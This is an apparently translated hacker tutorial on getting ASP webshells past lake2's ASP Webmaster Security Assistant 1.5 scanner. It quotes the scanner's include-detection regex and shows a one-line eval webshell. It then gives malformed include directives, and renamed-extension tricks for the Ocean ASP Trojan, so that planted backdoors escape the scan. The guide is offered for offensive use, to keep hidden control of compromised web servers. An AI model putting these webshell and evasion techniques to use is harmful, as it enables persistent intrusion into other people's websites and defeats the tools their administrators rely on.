In the last Evil Octal contest lake2 brought out his own ASP Trojan killer, the Leike graph ASP Webmaster Security Assistant, against my "ultimate anti-kill" ASP Trojan. I won that round, of course, and the result was an ASP Trojan that lake2's tool could not kill. But after lake2 released version 1.5 of the Leike graph ASP Webmaster Security Assistant, even that horse was honorably sacrificed. Out with the old, in with the new.

The article "Study on ASP Trojan-free killing" showed that by using a folder named with an ".asp" suffix on Windows 2003, and by using copy to prepend an image to the header of the ASP Trojan, the Ocean ASP Trojan could be brought back to life. Those methods were not perfect: the last time the anti-kill ASP Trojan was designed it was killed as well, and the use of a one-sentence Trojan was not perfect either. Today I will try again to break through the Leike graph ASP Webmaster Security Assistant and build ASP Trojans that are easier to use.

lake2's website carries the source code of version 1.5. This version has indeed improved a lot and adds three detection and removal functions:
1. scanning and killing ASP Trojans that have been Unicode-encoded;
2. checking and killing files that use the (Open|Create)TextFile, SaveToFile, Save, Set Server, Server.(Transfer|Execute), ShellExecute, Exec and Run methods;
3. changing the way files are opened, from OpenTextFile in FSO to the Open method of ADODB.Stream.

With these three functions added, the program's Trojan detection and removal capabilities are greatly enhanced, and it is difficult to break through them by the old means. No wonder lake2 says on his website that it can kill almost all ASP Trojans. Today we will see how to break through it. Reading the assistant's code this time, I noticed one thing: this ASP Webmaster Security Assistant makes heavy use of regular expressions.

My personal opinion on regular expressions is this: if the matching is written well, it is not easy to break through; but if the matching is written poorly, it is easy to break through, and a powerful system becomes insecure. Before breaking through it, let us look at the basic syntax of regular expressions:

*    Matches the preceding subexpression zero or more times. For example, zo* matches "z" and "zoo". * is equivalent to {0,}.
\s   Matches any whitespace character, including spaces, tabs and form feeds. It is equivalent to [ \f\n\r\t\v].
.    Matches any single character except the newline \n. To match a literal ".", use "\.".

If "\s" and "*" are combined as "\s*", zero or more spaces, tabs and form feeds are matched; if "." and "*" are combined as ".*", zero or more characters other than line breaks are matched. With this knowledge, let us look at its code. The following code is in admin_scanwebshell.asp:

    'Check include file
    Set RegEx = New RegExp                                   ' create a regular expression object
    RegEx.IgnoreCase = True                                  ' case insensitive
    RegEx.Global = True                                      ' global match
    RegEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""    ' the pattern
    Set Matches = RegEx.Execute(filetxt)                     ' search the string filetxt with the pattern and return the matches; if nothing matches, the result holds no matches
    For Each Match In Matches
        ' take the text between the first quotation mark of the match and its last character, and turn "/" into "\"
        tfile = Replace(Mid(Match.Value, InStr(Match.Value, """") + 1, Len(Match.Value) - InStr(Match.Value, """") - 1), "/", "\")
        If Not CheckExt(FSOs.GetExtensionName(tfile)) Then   ' if the suffix is one that must be checked, scan that file next
            Call ScanFile(Mid(filepath, 1, InStrRev(filepath, "\")) & tfile, Replace(filepath, Server.MapPath("/") & "\", "", 1))   ' scan and kill the included file
            sumfiles = sumfiles + 1
        End If
    Next

(Note: almost the same function appears in another file, but with the double quotation marks in the pattern above replaced by single quotation marks.)

Next, let us analyze how this program executes. Suppose we use <!--#include file="1.txt"-->. The program searches filetxt with the pattern set in RegEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*""" and returns the search results. Because our string <!--#include file="1.txt"--> is consistent with the pattern, a result is returned, and the search, replace, scan and kill steps follow. If we can construct a string that does not conform to this pattern, nothing is returned and our ASP horse is not killed. Here is the experiment.

Step 1. Create a new file ttfct.txt with the content <% eval request("go") %>. Then create a new file nokill.asp with the content <!--#include file="ttfct.txt"-->. Scan it with Leike graph ASP Webmaster Security Assistant 1.5, and connect with lake2's client; the connection is normal.

Step 2. Change nokill.asp to <!--#include file="ttfct.t"ss"xt"--> and connect again. I don't know whether you noticed this message:

    Active Server Pages, ASP 0126 (0x80004005)
    Cannot find the include file 'ttfct.t'.
    /ttfct/nokill.asp, line 1

Why is only ttfct.t left here? Because the "xt" was cut off: the name was truncated at the second quotation mark. So we put the xt back and change the content to <!--#include file="ttfct.txt"ss"xt"-->, then submit again. This time the submission succeeds, and the result is displayed the same way as in Figure 2. Now compare the statement we constructed, <!--#include file="ttfct.txt"ss"xt"-->, with RegEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*""": our statement has four quotation marks while the matching statement has only two, so of course the match does not succeed. The following results come from my analysis. "include file=" can be followed by a string directly, so quotation marks are not required on both sides. Therefore we change the content to "ttfct"<!--#include file="ttfct.txt"-->, which also connects successfully and breaks through the Leike graph ASP Webmaster Security Assistant. Then we construct <!--#include file=ttfct.txt--> (note: ttfct.txt has no quotation marks on either side). In this way our Trojan horse survives for a long time; in a word, the Trojan comes back to life.

In the same way we can keep the Ocean ASP Trojan from being scanned and killed. The specific method is to change the suffix of the Ocean ASP Trojan to .dll, .hack and so on; use whatever you like, or change it to your own name :). Then create a new file Hy.asp, put the code <!--#include file="Hy.dll"stssst"--> into it, and access Hy.asp to call Ocean.

Conclusion: besides understanding ASP, we also need practice to achieve success. If you have a better way to do this, please feel free to contact me. My ID is ttfct.